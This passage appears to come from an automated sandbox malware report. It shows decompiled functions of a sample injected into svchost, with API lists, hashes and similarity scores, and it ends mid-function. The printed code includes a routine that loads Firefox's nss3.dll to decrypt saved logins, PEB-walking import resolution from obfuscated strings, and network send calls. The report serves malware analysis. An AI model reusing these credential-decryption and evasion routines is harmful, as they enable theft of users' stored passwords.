                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,00000000,?,?,0BC02182,?), ref: 0BC091DA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocFolderLocalPath
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1254228173-0
                                                                                                                                        • Opcode ID: 7c50a904c2d5fd1af68cbbc615b8960591cce651c81eafda6a73e9a857e4bb1d
                                                                                                                                        • Instruction ID: 5d038aee69a59388f22f136475bfdc7bb3ca73b8d4bbb4a97d629848eee6ee4e
                                                                                                                                        • Opcode Fuzzy Hash: 7c50a904c2d5fd1af68cbbc615b8960591cce651c81eafda6a73e9a857e4bb1d
                                                                                                                                        • Instruction Fuzzy Hash: F6D0C9756512287BE7001AA5AC0DEB77EDCEB056A5F014220FF08D6280D5618E1087E0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.25%

                                                                                                                                        Function 0BC02B0B, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                        			E0BC02B0B(void* __ecx, void* __eflags, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				void* _v8;
				void* __ebx;
				void* _t10;
				intOrPtr* _t11;
				intOrPtr _t13;
				intOrPtr _t20;

				__imp__CreateStreamOnHGlobal(0, 1,  &_v8, _t13, __ecx, __ecx);
				_t10 = E0BC08A86(_t13, _v8, _t20, _a8); // executed
				_t24 = _t10;
				if(_t10 != 0) {
					E0BC037E4(_v8, _t24, _a4, _a12, E0BC02B55); // executed
				}
				_t11 = _v8;
				if(_t11 != 0) {
					_t11 =  *((intOrPtr*)( *_t11 + 8))(_t11);
				}
				return _t11;
			}









                                                                                                                                        0x0bc02b19
                                                                                                                                        0x0bc02b25
                                                                                                                                        0x0bc02b2b
                                                                                                                                        0x0bc02b2d
                                                                                                                                        0x0bc02b3d
                                                                                                                                        0x0bc02b42
                                                                                                                                        0x0bc02b45
                                                                                                                                        0x0bc02b4a
                                                                                                                                        0x0bc02b4f
                                                                                                                                        0x0bc02b4f
                                                                                                                                        0x0bc02b54

                                                                                                                                        APIs
                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0BC02B19
                                                                                                                                          • Part of subcall function 0BC08A86: CreateFileA.KERNELBASE(0BC09A62,80000000,00000003,00000000,00000003,00000000,00000000,HWID,?,?,0BC09A62,00000000,?,?,?), ref: 0BC08AB3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create$FileGlobalStream
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 157780020-0
                                                                                                                                        • Opcode ID: 26b063c88fa4cbecb3055e79e5920151aca184ca1e04429e19f1921cd2edc82e
                                                                                                                                        • Instruction ID: 076d8a412a6d259d337f1393e51615e22ed6c500db7676a2fbb89c8d6900ef5c
                                                                                                                                        • Opcode Fuzzy Hash: 26b063c88fa4cbecb3055e79e5920151aca184ca1e04429e19f1921cd2edc82e
                                                                                                                                        • Instruction Fuzzy Hash: 6CF01C71620208FFDB11DF94CC8AF9E776DEB48211F144069FA069E1D0EE72DA01AB20
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.05%

                                                                                                                                        Function 0BC0184B, Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • send.WS2_32(00000000,?,00000000,00000000), ref: 0BC01869
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: send
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2809346765-0
                                                                                                                                        • Opcode ID: 1f085b668f732ffcea280dda52a00ed8b6bbc1450afc8db2774cc2aef22cae63
                                                                                                                                        • Instruction ID: 93064508f8aa772a01ccf0e4fe0ab8d814429d9c8abed4184fec2c5da47e1b2f
                                                                                                                                        • Opcode Fuzzy Hash: 1f085b668f732ffcea280dda52a00ed8b6bbc1450afc8db2774cc2aef22cae63
                                                                                                                                        • Instruction Fuzzy Hash: 45E09B3263921466DB210D678C04B97B7DDDF81765F068235FA29E2050DA30D7518B70
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.03%

                                                                                                                                        Function 0BC0912B, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E0BC0912B(CHAR* __eax) {
				signed char _t4;

				if(__eax == 0 ||  *__eax == 0) {
					L5:
					return 0;
				} else {
					_t4 = GetFileAttributesA(__eax); // executed
					if(_t4 == 0xffffffff || (_t4 & 0x00000010) == 0) {
						goto L5;
					} else {
						return 1;
					}
				}
			}




                                                                                                                                        0x0bc0912d
                                                                                                                                        0x0bc09148
                                                                                                                                        0x0bc0914a
                                                                                                                                        0x0bc09134
                                                                                                                                        0x0bc09135
                                                                                                                                        0x0bc0913e
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc09144
                                                                                                                                        0x0bc09147
                                                                                                                                        0x0bc09147
                                                                                                                                        0x0bc0913e

                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,0BC06726), ref: 0BC09135
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: d6310c12133d18170fe43554cc665420d1d3a16e378b5dcca4399d025996463b
                                                                                                                                        • Instruction ID: 273f6ed116c28e156d8fbb487e20c2246a0685f694b2ee6e5b8f4f6c9160f08e
                                                                                                                                        • Opcode Fuzzy Hash: d6310c12133d18170fe43554cc665420d1d3a16e378b5dcca4399d025996463b
                                                                                                                                        • Instruction Fuzzy Hash: BCC002A0B7368159FB25153C484C3A626898B4A26BF690BE0A8B6D10E6EFB4C642D120
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.01%

                                                                                                                                        Function 0BC08D3D, Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E0BC08D3D(void* _a4) {
				void* _t3;
				void* _t4;

				if(_a4 != 0) {
					_t4 = LocalFree(_a4); // executed
					return _t4;
				}
				return _t3;
			}





                                                                                                                                        0x0bc08d44
                                                                                                                                        0x0bc08d49
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc08d49
                                                                                                                                        0x0bc08d50

                                                                                                                                        APIs
                                                                                                                                        • LocalFree.KERNELBASE(00000000,?,0BC08E77,?), ref: 0BC08D49
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeLocal
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2826327444-0
                                                                                                                                        • Opcode ID: a0835796c4dbf97950b2f5322763f556b284501a291b9e1deb496a58eebb2258
                                                                                                                                        • Instruction ID: 9455c5d60ef590c0d68d140232a20b40a7c58136e3b0c6aca8f02e873d4ad952
                                                                                                                                        • Opcode Fuzzy Hash: a0835796c4dbf97950b2f5322763f556b284501a291b9e1deb496a58eebb2258
                                                                                                                                        • Instruction Fuzzy Hash: 6DB09230021A0CEBCB051F54E8087A93FE8FB00649F488220B90C084B0CB72A7A1CA90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.06%

                                                                                                                                        Function 0BC08D51, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E0BC08D51(void* __eax) {
				void* _t3;

				_t3 = LocalAlloc(0x40, __eax - 0xffffff80); // executed
				return _t3;
			}




                                                                                                                                        0x0bc08d57
                                                                                                                                        0x0bc08d5d

                                                                                                                                        APIs
                                                                                                                                        • LocalAlloc.KERNELBASE(00000040,?,0BC08E59), ref: 0BC08D57
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocLocal
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3494564517-0
                                                                                                                                        • Opcode ID: 58aa0496ac6d45fa6fa0775f0dd793cea567e80eeb7479e19074cd84430951c2
                                                                                                                                        • Instruction ID: 1fbeeca49b2448152b81154e2c2aba7279835e6eaaaaadb4dd1a2fca89c4965c
                                                                                                                                        • Opcode Fuzzy Hash: 58aa0496ac6d45fa6fa0775f0dd793cea567e80eeb7479e19074cd84430951c2
                                                                                                                                        • Instruction Fuzzy Hash: 63A022B08200002AFC000A382E0EF223EA8CB02320F000300F328F00C8C2208200C02C
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.05%

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 0BC061DF, Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 103libraryloaderstringUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 48%
                                                                                                                                        			E0BC061DF(CHAR* __ebx, void* __ecx, CHAR* _a4) {
				signed int _v8;
				int _t8;
				intOrPtr* _t20;
				signed int _t21;
				signed int _t23;
				char* _t28;
				CHAR* _t29;
				struct HINSTANCE__* _t35;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t51;

				_t29 = __ebx;
				_v8 = _v8 & 0x00000000;
				 *0xbc10d14 =  *0xbc10d14 & 0x00000000;
				_t8 = lstrlenA(__ebx);
				if(_t8 > 2) {
					_t28 = _t8 + __ebx - 2;
					if( *_t28 == 0x5c5c) {
						 *_t28 = 0x5c;
					}
				}
				SetCurrentDirectoryA(_a4);
				_t35 = LoadLibraryA("nss3.dll");
				 *0xbc10d28 = GetProcAddress(_t35, "NSS_Init");
				 *0xbc10d10 = GetProcAddress(_t35, "PK11_GetInternalKeySlot");
				 *0xbc10d3c = GetProcAddress(_t35, "PK11_Authenticate");
				 *0xbc10d30 = GetProcAddress(_t35, "PK11SDR_Decrypt");
				 *0xbc10d5c = GetProcAddress(_t35, "NSSBase64_DecodeBuffer");
				 *0xbc10d34 = GetProcAddress(_t35, "PK11_CheckUserPassword");
				 *0xbc10d44 = GetProcAddress(_t35, "SECITEM_FreeItem");
				 *0xbc10d50 = GetProcAddress(_t35, "NSS_Shutdown");
				 *0xbc10d24 = GetProcAddress(_t35, "PK11_FreeSlot");
				_t20 =  *0xbc10d28; // 0x0
				if(_t20 == 0) {
					L15:
					_t21 = 0;
					L16:
					return _t21;
				}
				_t48 =  *0xbc10d10; // 0x0
				if(_t48 == 0) {
					goto L15;
				}
				_t49 =  *0xbc10d50; // 0x0
				if(_t49 == 0) {
					goto L15;
				}
				_t50 =  *0xbc10d3c; // 0x0
				if(_t50 == 0) {
					goto L15;
				}
				_t51 =  *0xbc10d5c; // 0x0
				if(_t51 == 0) {
					goto L15;
				}
				_push(_t29);
				if( *_t20() == 0) {
					_t23 =  *0xbc10d10();
					 *0xbc10d14 = _t23;
					if(_t23 == 0) {
						 *0xbc10d50();
					}
					_push(0);
					_push(1);
					_push( *0xbc10d14);
					if( *0xbc10d3c() == 0) {
						_v8 = 1;
					} else {
						 *0xbc10d24( *0xbc10d14);
						 *0xbc10d50();
						 *0xbc10d14 = 0;
					}
				}
				_t21 = _v8;
				goto L16;
			}















                                                                                                                                        0x0bc061df
                                                                                                                                        0x0bc061e3
                                                                                                                                        0x0bc061e7
                                                                                                                                        0x0bc061ef
                                                                                                                                        0x0bc061f8
                                                                                                                                        0x0bc061fa
                                                                                                                                        0x0bc06207
                                                                                                                                        0x0bc06209
                                                                                                                                        0x0bc06209
                                                                                                                                        0x0bc06207
                                                                                                                                        0x0bc06211
                                                                                                                                        0x0bc06228
                                                                                                                                        0x0bc06238
                                                                                                                                        0x0bc06245
                                                                                                                                        0x0bc06252
                                                                                                                                        0x0bc0625f
                                                                                                                                        0x0bc0626c
                                                                                                                                        0x0bc06279
                                                                                                                                        0x0bc06286
                                                                                                                                        0x0bc06293
                                                                                                                                        0x0bc0629a
                                                                                                                                        0x0bc0629f
                                                                                                                                        0x0bc062a8
                                                                                                                                        0x0bc06322
                                                                                                                                        0x0bc06322
                                                                                                                                        0x0bc06324
                                                                                                                                        0x0bc06327
                                                                                                                                        0x0bc06327
                                                                                                                                        0x0bc062aa
                                                                                                                                        0x0bc062b0
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc062b2
                                                                                                                                        0x0bc062b8
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc062ba
                                                                                                                                        0x0bc062c0
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc062c2
                                                                                                                                        0x0bc062c8
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc062ca
                                                                                                                                        0x0bc062d0
                                                                                                                                        0x0bc062d2
                                                                                                                                        0x0bc062d8
                                                                                                                                        0x0bc062df
                                                                                                                                        0x0bc062e1
                                                                                                                                        0x0bc062e1
                                                                                                                                        0x0bc062e9
                                                                                                                                        0x0bc062eb
                                                                                                                                        0x0bc062ec
                                                                                                                                        0x0bc062fd
                                                                                                                                        0x0bc0631a
                                                                                                                                        0x0bc062ff
                                                                                                                                        0x0bc06305
                                                                                                                                        0x0bc0630c
                                                                                                                                        0x0bc06312
                                                                                                                                        0x0bc06312
                                                                                                                                        0x0bc062fd
                                                                                                                                        0x0bc0631d
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32 ref: 0BC061EF
                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?), ref: 0BC06211
                                                                                                                                        • LoadLibraryA.KERNEL32(nss3.dll), ref: 0BC0621C
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 0BC06230
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 0BC0623D
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 0BC0624A
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 0BC06257
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSSBase64_DecodeBuffer), ref: 0BC06264
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,PK11_CheckUserPassword), ref: 0BC06271
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 0BC0627E
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 0BC0628B
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 0BC06298
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$CurrentDirectoryLibraryLoadlstrlen
                                                                                                                                        • String ID: NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll
                                                                                                                                        • API String ID: 3685612757-1564949615
                                                                                                                                        • Opcode ID: 5fc6a67ae3e67396f78779a94e843d4baa954fd741b03378f0f13072114171dd
                                                                                                                                        • Instruction ID: 15f236f2910cf940f675c01126528f6cced81d64b2fa67089fd6d7e87e47088b
                                                                                                                                        • Opcode Fuzzy Hash: 5fc6a67ae3e67396f78779a94e843d4baa954fd741b03378f0f13072114171dd
                                                                                                                                        • Instruction Fuzzy Hash: B8310F70D61215DBC7206FA6DC49A1A7FF8FB47A11B908D2AF401E6191DF74E780CEA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 0BC09FDC, Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                        			E0BC09FDC(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0xbc10000; // 0xbb40e64e
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0xbc10ae8 = _t6;
				 *0xbc10ae4 = _t22;
				 *0xbc10ae0 = _t25;
				 *0xbc10adc = _t21;
				 *0xbc10ad8 = _t27;
				 *0xbc10ad4 = _t26;
				 *0xbc10b00 = ss;
				 *0xbc10af4 = cs;
				 *0xbc10ad0 = ds;
				 *0xbc10acc = es;
				 *0xbc10ac8 = fs;
				 *0xbc10ac4 = gs;
				asm("pushfd");
				_pop( *0xbc10af8);
				 *0xbc10aec =  *_t31;
				 *0xbc10af0 = _v0;
				 *0xbc10afc =  &_a4;
				 *0xbc10a38 = 0x10001;
				_t11 =  *0xbc10af0; // 0x0
				 *0xbc109ec = _t11;
				 *0xbc109e0 = 0xc0000409;
				 *0xbc109e4 = 1;
				_t12 =  *0xbc10000; // 0xbb40e64e
				_v812 = _t12;
				_t13 =  *0xbc10004; // 0x44bf19b1
				_v808 = _t13;
				 *0xbc10a30 = IsDebuggerPresent();
				_push(1);
				E0BC0A0F4(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0xbc0c200);
				if( *0xbc10a30 == 0) {
					_push(1);
					E0BC0A0F4(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                                        0x0bc09fdc
                                                                                                                                        0x0bc09fdc
                                                                                                                                        0x0bc09fdc
                                                                                                                                        0x0bc09fdc
                                                                                                                                        0x0bc09fdc
                                                                                                                                        0x0bc09fdc
                                                                                                                                        0x0bc09fdc
                                                                                                                                        0x0bc09fe2
                                                                                                                                        0x0bc09fe4
                                                                                                                                        0x0bc09fe4
                                                                                                                                        0x0bc09ff9
                                                                                                                                        0x0bc09ffe
                                                                                                                                        0x0bc0a004
                                                                                                                                        0x0bc0a00a
                                                                                                                                        0x0bc0a010
                                                                                                                                        0x0bc0a016
                                                                                                                                        0x0bc0a01c
                                                                                                                                        0x0bc0a023
                                                                                                                                        0x0bc0a02a
                                                                                                                                        0x0bc0a031
                                                                                                                                        0x0bc0a038
                                                                                                                                        0x0bc0a03f
                                                                                                                                        0x0bc0a046
                                                                                                                                        0x0bc0a047
                                                                                                                                        0x0bc0a050
                                                                                                                                        0x0bc0a058
                                                                                                                                        0x0bc0a060
                                                                                                                                        0x0bc0a06b
                                                                                                                                        0x0bc0a075
                                                                                                                                        0x0bc0a07a
                                                                                                                                        0x0bc0a07f
                                                                                                                                        0x0bc0a089
                                                                                                                                        0x0bc0a093
                                                                                                                                        0x0bc0a098
                                                                                                                                        0x0bc0a09e
                                                                                                                                        0x0bc0a0a3
                                                                                                                                        0x0bc0a0af
                                                                                                                                        0x0bc0a0b4
                                                                                                                                        0x0bc0a0b6
                                                                                                                                        0x0bc0a0be
                                                                                                                                        0x0bc0a0c9
                                                                                                                                        0x0bc0a0d6
                                                                                                                                        0x0bc0a0d8
                                                                                                                                        0x0bc0a0da
                                                                                                                                        0x0bc0a0df
                                                                                                                                        0x0bc0a0f3

                                                                                                                                        APIs
                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 0BC0A0A9
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0BC0A0BE
                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(0BC0C200), ref: 0BC0A0C9
                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 0BC0A0E5
                                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 0BC0A0EC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2579439406-0
                                                                                                                                        • Opcode ID: 06c3e7a6e9e27c15c153936e52d95404f8f8335307ca848949e51ff0fd3abc80
                                                                                                                                        • Instruction ID: cdc996cac05d7a56d2ddbb2a388c6ebf975a6b92f7d4aeffdda3cc2aa04f9785
                                                                                                                                        • Opcode Fuzzy Hash: 06c3e7a6e9e27c15c153936e52d95404f8f8335307ca848949e51ff0fd3abc80
                                                                                                                                        • Instruction Fuzzy Hash: 7821A0B5A62204DFD740DF69E545B493BE4FB0A314F81495AF509A7A80DBB0DBC0CF15
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.01%

                                                                                                                                        Function 0BC09DF5, Relevance: 5.1, Strings: 4, Instructions: 149COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                        			E0BC09DF5(signed int __ecx) {
				signed int _v8;
				char _v10;
				short _v12;
				intOrPtr _v16;
				char _v20;
				short _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v42;
				short _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				intOrPtr _v116;
				char _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				char _v140;
				char _v148;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				intOrPtr _t74;
				intOrPtr _t83;
				signed int _t84;
				signed int _t92;
				signed int _t93;
				signed int _t95;
				signed int _t105;
				signed int _t113;

				_t69 =  *0xbc10000; // 0xbb40e64e
				_v8 = _t69 ^ _t113;
				_t109 =  *( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x1c)) + 8);
				_t111 = __ecx;
				_v108 = __ecx;
				_v20 = 0x4c72644c;
				_v16 = 0x4464616f;
				_v12 = 0x6c6c;
				_v10 = 0;
				_v100 = 0x436c7452;
				_v96 = 0x74616572;
				_v92 = 0x696e5565;
				_v88 = 0x65646f63;
				_v84 = 0x69727453;
				_v80 = 0x7246676e;
				_v76 = 0x73416d6f;
				_v72 = 0x7a696963;
				_v68 = 0;
				_v64 = 0x4772644c;
				_v60 = 0x72507465;
				_v56 = 0x6465636f;
				_v52 = 0x41657275;
				_v48 = 0x65726464;
				_v44 = 0x7373;
				_v42 = 0;
				_v40 = 0x496c7452;
				_v36 = 0x4174696e;
				_v32 = 0x5369736e;
				_v28 = 0x6e697274;
				_v24 = 0x67;
				_t116 = _t109;
				if(_t109 == 0) {
					L19:
					_t74 = 0;
					__eflags = 0;
				} else {
					_v124 = E0BC09D48(_t116, _t109,  &_v20);
					_t33 =  &_v100; // 0x436c7452
					_v132 = E0BC09D48(_t116, _t109, _t33);
					_t35 =  &_v64; // 0x4772644c
					_v116 = E0BC09D48(_t116, _t109, _t35);
					_t37 =  &_v40; // 0x496c7452
					_t83 = E0BC09D48(_t116, _t109, _t37);
					_t107 = 1;
					_t109 =  &_v104;
					_v128 = _t83;
					_t84 = E0BC09D03(1,  &_v104, _t111);
					if(_v104 <= 0x14) {
						goto L19;
					} else {
						_t111 = _t84;
						_v104 = _t111;
						if( *_t84 == 0) {
							L18:
							_t74 = 1;
						} else {
							while(1) {
								_push( *((intOrPtr*)(_t111 + 0xc)) + _v108);
								_push( &_v140);
								if(_v132() == 0) {
									goto L19;
								}
								_push( &_v120);
								_push( &_v140);
								_push(0);
								_push(0);
								if(_v124() != 0) {
									goto L19;
								} else {
									_t109 =  *_t111 + _v108;
									_t111 =  *((intOrPtr*)(_t111 + 0x10)) + _v108;
									while(1) {
										_t92 =  *_t109;
										if(_t92 == 0) {
											break;
										}
										_t105 = 0;
										__eflags = _t92;
										if(_t92 >= 0) {
											_t107 = _v108;
											_t93 = _t92 + _v108 + 2;
										} else {
											_t93 = _t92 & 0x0000ffff;
											_t105 = 1;
										}
										_v112 = 0;
										__eflags = _t105;
										if(_t105 != 0) {
											_push( &_v112);
											_push(_t93);
											_push(0);
										} else {
											_v128( &_v148, _t93);
											_push( &_v112);
											_push(0);
											_push( &_v148);
										}
										_v116(_v120);
										_t95 = _v112;
										__eflags = _t95;
										if(_t95 == 0) {
											goto L19;
										} else {
											 *_t111 = _t95;
											_t109 =  &(_t109[1]);
											_t111 = _t111 + 4;
											__eflags = _t111;
											continue;
										}
										goto L20;
									}
									_v104 = _v104 + 0x14;
									if( *_v104 != 0) {
										_t111 = _v104;
										continue;
									} else {
										goto L18;
									}
								}
								goto L20;
							}
							goto L19;
						}
					}
				}
				L20:
				return E0BC09FDC(_t74, 0, _v8 ^ _t113, _t107, _t109, _t111);
			}



















































                                                                                                                                        0x0bc09dfe
                                                                                                                                        0x0bc09e05
                                                                                                                                        0x0bc09e19
                                                                                                                                        0x0bc09e1c
                                                                                                                                        0x0bc09e1e
                                                                                                                                        0x0bc09e21
                                                                                                                                        0x0bc09e28
                                                                                                                                        0x0bc09e2f
                                                                                                                                        0x0bc09e35
                                                                                                                                        0x0bc09e38
                                                                                                                                        0x0bc09e3f
                                                                                                                                        0x0bc09e46
                                                                                                                                        0x0bc09e4d
                                                                                                                                        0x0bc09e54
                                                                                                                                        0x0bc09e5b
                                                                                                                                        0x0bc09e62
                                                                                                                                        0x0bc09e69
                                                                                                                                        0x0bc09e70
                                                                                                                                        0x0bc09e73
                                                                                                                                        0x0bc09e7a
                                                                                                                                        0x0bc09e81
                                                                                                                                        0x0bc09e88
                                                                                                                                        0x0bc09e8f
                                                                                                                                        0x0bc09e96
                                                                                                                                        0x0bc09e9c
                                                                                                                                        0x0bc09e9f
                                                                                                                                        0x0bc09ea6
                                                                                                                                        0x0bc09ead
                                                                                                                                        0x0bc09eb4
                                                                                                                                        0x0bc09ebb
                                                                                                                                        0x0bc09ec1
                                                                                                                                        0x0bc09ec3
                                                                                                                                        0x0bc09fcb
                                                                                                                                        0x0bc09fcb
                                                                                                                                        0x0bc09fcb
                                                                                                                                        0x0bc09ec9
                                                                                                                                        0x0bc09ed3
                                                                                                                                        0x0bc09ed6
                                                                                                                                        0x0bc09ee0
                                                                                                                                        0x0bc09ee3
                                                                                                                                        0x0bc09eed
                                                                                                                                        0x0bc09ef0
                                                                                                                                        0x0bc09ef5
                                                                                                                                        0x0bc09eff
                                                                                                                                        0x0bc09f00
                                                                                                                                        0x0bc09f03
                                                                                                                                        0x0bc09f06
                                                                                                                                        0x0bc09f0f
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc09f15
                                                                                                                                        0x0bc09f15
                                                                                                                                        0x0bc09f17
                                                                                                                                        0x0bc09f1c
                                                                                                                                        0x0bc09fc7
                                                                                                                                        0x0bc09fc7
